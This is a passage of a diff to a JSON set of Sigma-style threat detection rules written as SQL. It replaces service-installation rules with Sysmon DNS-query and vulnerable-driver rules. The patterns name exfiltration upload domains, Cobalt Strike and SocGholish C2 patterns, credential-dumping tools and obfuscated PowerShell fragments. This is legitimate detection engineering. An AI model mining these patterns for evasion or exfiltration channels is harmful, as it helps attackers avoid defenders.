AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" + "filename": "dns_query_win_tor_onion.yml" }, { - "title": "Service Installation with Suspicious Folder Pattern", - "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "title": "Regsvr32 Network Activity - DNS", + "id": "36e037c4-c228-4866-b6a3-48eb292b9955", "status": "test", - "description": "Detects service installation with suspicious folder patterns", - "author": "pH-T (Nextron Systems)", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.execution", + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml" + "filename": "dns_query_win_regsvr32_network_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - System", - "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "title": "DNS Query for MEGA.io Upload Domain - Sysmon", + "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", + "status": "test", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "tags": [ + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" + "filename": "dns_query_win_mega_nz.yml" }, { - "title": "DHCP Server Error Failed Loading the CallOut DLL", - "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "title": "DNS HybridConnectionManager Service Bus", + "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "status": "test", - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "author": "Dimitrios Slamaris, @atc_project (fix)", + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND Image LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "win_system_susp_dhcp_config_failed.yml" + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - System", - "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "title": "Potential SocGholish Second Stage C2 DNS Query", + "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", + "author": "Dusty Miller", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" ], - "filename": "win_system_invoke_obfuscation_var_services.yml" + "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" }, { - "title": "StoneDrill Service Install", - "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", - "status": "test", - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query for Anonfiles.com Domain - Sysmon", + "id": "065cceea-77ec-4030-9052-fc0affea7110", + "status": "experimental", + "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "win_system_apt_stonedrill.yml" + "filename": "dns_query_win_anonymfiles_com.yml" }, { - "title": "ProcessHacker Privilege Elevation", - "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", - "status": "test", - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", - "author": "Florian Roth (Nextron Systems)", + "title": "DNS Query for Ufile.io Upload Domain - Sysmon", + "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "status": "experimental", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "yatinwad and TheDFIRReport", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "win_system_susp_proceshacker.yml" + "filename": "dns_query_win_ufile_io.yml" }, { - "title": "Sysmon Crash", - "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", - "status": "experimental", - "description": "Detects application popup reporting a failure of the Sysmon service", - "author": "Tim Shelton", + "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", + "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "win_system_application_sysmon_crash.yml" + "filename": "dns_query_win_mal_cobaltstrike.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - System", - "id": "487c7524-f892-4054-b263-8a0ace63fc25", + "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "id": "295c9289-acee-4503-a571-8eacaef36b28", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594')))" ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" + "filename": "driver_load_win_vuln_hevd_driver.yml" }, { - "title": "Sliver C2 Default Service Installation", - "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "title": "WinDivert Driver Load", + "id": "679085d5-f427-4484-9f58-1dc30a7c426d", "status": "experimental", - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.collection", + "attack.defense_evasion", + "attack.t1599.001", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate WinDivert driver usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9')))" ], - "filename": "win_system_service_install_sliver.yml" + "filename": "driver_load_win_windivert.yml" }, { - "title": "Hacktool Service Registration or Execution", - "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", - "status": "test", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "title": "Vulnerable Lenovo Driver Load", + "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "status": "experimental", + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate driver loads (old driver that didn't receive an update)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f'))" ], - "filename": "win_system_service_install_hacktools.yml" + "filename": "driver_load_win_vuln_lenovo_driver.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - System", - "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "title": "Vulnerable AVAST Anti Rootkit Driver Load", + "id": "7c676970-af4f-43c8-80af-ec9b49952852", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired'))))" ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" + "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", - "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "title": "Vulnerable Driver Load", + "id": "7aaaf4b8-e47c-4295-92ee-6ed40a6f60c8", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the load of known vulnerable drivers by hash value", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%MD5=1b5c3c458e31bede55145d0644e88d75%' ESCAPE '\\' OR Hashes LIKE '%MD5=6f5d54ab483659ac78672440422ae3f1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=c02f70960fa934b8defa16a03d7f6556%' ESCAPE '\\' OR Hashes LIKE '%MD5=839cbbc86453960e9eb6db814b776a40%' ESCAPE '\\' OR Hashes LIKE '%MD5=acac842a46f3501fe407b1db1b247a0b%' ESCAPE '\\' OR Hashes LIKE '%MD5=95e4c7b0384da89dce8ea6f31c3613d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=e700a820f117f65e813b216fccbf78c9%' ESCAPE '\\' OR Hashes LIKE '%MD5=96b463b6fa426ae42c414177af550ba2%' ESCAPE '\\' OR Hashes LIKE '%MD5=27bcbeec8a466178a6057b64bef66512%' ESCAPE '\\' OR Hashes LIKE '%MD5=70dcd07d38017b43f710061f37cb4a91%' ESCAPE '\\' OR Hashes LIKE '%MD5=db72def618cbc3c5f9aa82f091b54250%' ESCAPE '\\' OR Hashes LIKE '%MD5=83601bbe5563d92c1fdb4e960d84dc77%' ESCAPE '\\' OR Hashes LIKE '%MD5=5970e8de1b337ca665114511b9d10806%' ESCAPE '\\' OR Hashes LIKE '%MD5=49fe3d1f3d5c2e50a0df0f6e8436d778%' ESCAPE '\\' OR Hashes LIKE '%MD5=1493d342e7a36553c56b2adea150949e%' ESCAPE '\\' OR Hashes LIKE '%MD5=4f191abc652d8f7442ca2636725e1ed6%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ae30291c6cbfa7be39320badd6e8de0%' ESCAPE '\\' OR Hashes LIKE '%MD5=d104621c93213942b7b43d65b5d8d33e%' ESCAPE '\\' OR Hashes LIKE '%MD5=b89b097b8b8aecb8341d05136f334ebb%' ESCAPE '\\' OR Hashes LIKE '%MD5=14580bd59c55185115fd3abe73b016a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=992ded5b623be3c228f32edb4ca3f2d2%' ESCAPE '\\' OR Hashes LIKE '%MD5=a26e600652c33dd054731b4693bf5b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=1f950cfd5ed8dd9de3de004f5416fe20%' ESCAPE '\\' OR Hashes LIKE '%MD5=491aec2249ad8e2020f9f9b559ab68a8%' ESCAPE '\\' OR Hashes LIKE '%MD5=e4266262a77fffdea2584283f6c4f51d%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd25be845c151370ff177509d95d5add%' ESCAPE '\\' OR Hashes LIKE '%MD5=9638f265b1ddd5da6ecdf5c0619dcbe6%' ESCAPE '\\' OR Hashes LIKE '%MD5=4e90cd77509738d30d3181a4d0880bfa%' ESCAPE '\\' OR Hashes LIKE '%MD5=0a6a1c9a7f80a2a5dcced5c4c0473765%' ESCAPE '\\' OR Hashes LIKE '%MD5=9aa7ed7809eec0d8bc6c545a1d18107a%' ESCAPE '\\' OR Hashes LIKE '%MD5=aa1ed3917928f04d97d8a217fe9b5cb1%' ESCAPE '\\' OR Hashes LIKE '%MD5=42f7cc4be348c3efd98b0f1233cf2d69%' ESCAPE '\\' OR Hashes LIKE '%MD5=4cc3ddd5ae268d9a154a426af2c23ef9%' ESCAPE '\\' OR Hashes LIKE '%MD5=2fed983ec44d1e7cffb0d516407746f2%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7cbbb5eb263ec9a35a1042f52e82ca4%' ESCAPE '\\' OR Hashes LIKE '%MD5=ed6348707f177629739df73b97ba1b6e%' ESCAPE '\\' OR Hashes LIKE '%MD5=40bc58b7615d00eb55ad9ba700c340c1%' ESCAPE '\\' OR Hashes LIKE '%MD5=c3fea895fe95ea7a57d9f4d7abed5e71%' ESCAPE '\\' OR Hashes LIKE '%MD5=2128e6c044ee86f822d952a261af0b48%' ESCAPE '\\' OR Hashes LIKE '%MD5=3dbf69f935ea48571ea6b0f5a2878896%' ESCAPE '\\' OR Hashes LIKE '%MD5=c6f8983dd3d75640c072a8459b8fa55a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=79f7e6f98a5d3ab6601622be4471027f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bae1f127c4ff21d8fe45e2bbfc59c180%' ESCAPE '\\' OR Hashes LIKE '%MD5=c533d6d64b474ffc3169a0e0fc0a701a%' ESCAPE '\\' OR Hashes LIKE '%MD5=3f39f013168428c8e505a7b9e6cba8a2%' ESCAPE '\\' OR Hashes LIKE '%MD5=748cf64b95ca83abc35762ad2c25458f%' ESCAPE '\\' OR Hashes LIKE '%MD5=bce7f34912ff59a3926216b206deb09f%' ESCAPE '\\' OR Hashes LIKE '%MD5=2d8e4f38b36c334d0a32a7324832501d%' ESCAPE '\\' OR Hashes LIKE '%MD5=47e6ac52431ca47da17248d80bf71389%' ESCAPE '\\' OR Hashes LIKE '%MD5=3651a6990fe38711ebb285143f867a43%' ESCAPE '\\' OR Hashes LIKE '%MD5=dc943bf367ae77016ae399df8e71d38a%' ESCAPE '\\' OR Hashes LIKE '%MD5=02198692732722681f246c1b33f7a9d9%' ESCAPE '\\' OR Hashes LIKE '%MD5=ddc2ffe0ab3fcd48db898ab13c38d88d%' ESCAPE '\\' OR Hashes LIKE '%MD5=0ec361f2fba49c73260af351c39ff9cb%' ESCAPE '\\' OR Hashes LIKE '%MD5=c1fce7aac4e9dd7a730997e2979fa1e2%' ESCAPE '\\' OR Hashes LIKE '%MD5=49938383844ceec33dba794fb751c9a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=34069a15ae3aa0e879cd0d81708e4bcc%' ESCAPE '\\' OR Hashes LIKE '%MD5=1c294146fc77565030603878fd0106f9%' ESCAPE '\\' OR Hashes LIKE '%MD5=fd81af62964f5dd5eb4a828543a33dcf%' ESCAPE '\\' OR Hashes LIKE '%MD5=bd5b0514f3b40f139d8079138d01b5f6%' ESCAPE '\\' OR Hashes LIKE '%MD5=fa173832dca1b1faeba095e5c82a1559%' ESCAPE '\\' OR Hashes LIKE '%MD5=5cc5c26fc99175997d84fe95c61ab2c2%' ESCAPE '\\' OR Hashes LIKE '%MD5=1ed043249c21ab201edccb37f1d40af9%' ESCAPE '\\' OR Hashes LIKE '%MD5=361a598d8bb92c13b18abb7cac850b01%' ESCAPE '\\' OR Hashes LIKE '%MD5=9b359b722ac80c4e0a5235264e1e0156%' ESCAPE '\\' OR Hashes LIKE '%MD5=296bde4d0ed32c6069eb90c502187d0d%' ESCAPE '\\' OR Hashes LIKE '%MD5=d3e40644a91327da2b1a7241606fe559%' ESCAPE '\\' OR Hashes LIKE '%MD5=12cecc3c14160f32b21279c1a36b8338%' ESCAPE '\\' OR Hashes LIKE '%MD5=dd39a86852b498b891672ffbcd071c03%' ESCAPE '\\' OR Hashes LIKE '%MD5=b2a9ac0600b12ec9819e049d7a6a0b75%' ESCAPE '\\' OR Hashes LIKE '%MD5=444f538daa9f7b340cfd43974ed43690%' ESCAPE '\\' OR Hashes LIKE '%MD5=7b43dfd84de5e81162ebcfafb764b769%' ESCAPE '\\' OR Hashes LIKE '%MD5=13dda15ef67eb265869fc371c72d6ef0%' ESCAPE '\\' OR Hashes LIKE '%MD5=300c5b1795c9b6cc1bc4d7d55c7bbe85%' ESCAPE '\\' OR Hashes LIKE '%MD5=1392b92179b07b672720763d9b1028a5%' ESCAPE '\\' OR Hashes LIKE '%MD5=2e1f8a2a80221deb93496a861693c565%' ESCAPE '\\' OR Hashes LIKE '%MD5=8065a7659562005127673ac52898675f%' ESCAPE '\\' OR Hashes LIKE '%MD5=b5ada7fd226d20ec6634fc24768f9e22%' ESCAPE '\\' OR Hashes LIKE '%MD5=84fb76ee319073e77fb364bbbbff5461%' ESCAPE '\\' OR Hashes LIKE '%MD5=daf800da15b33bf1a84ee7afc59f0656%' ESCAPE '\\' OR Hashes LIKE '%MD5=f7393fb917aed182e4cbef25ce8af950%' ESCAPE '\\' OR Hashes LIKE '%MD5=120b5bbb9d2eb35ff4f62d79507ea63a%' ESCAPE '\\' OR Hashes LIKE '%MD5=73c98438ac64a68e88b7b0afd11ba140%' ESCAPE '\\' OR Hashes LIKE '%MD5=51207adb8dab983332d6b22c29fe8129%' ESCAPE '\\' OR Hashes LIKE '%MD5=4a23e0f2c6f926a41b28d574cbc6ac30%' ESCAPE '\\' OR Hashes LIKE 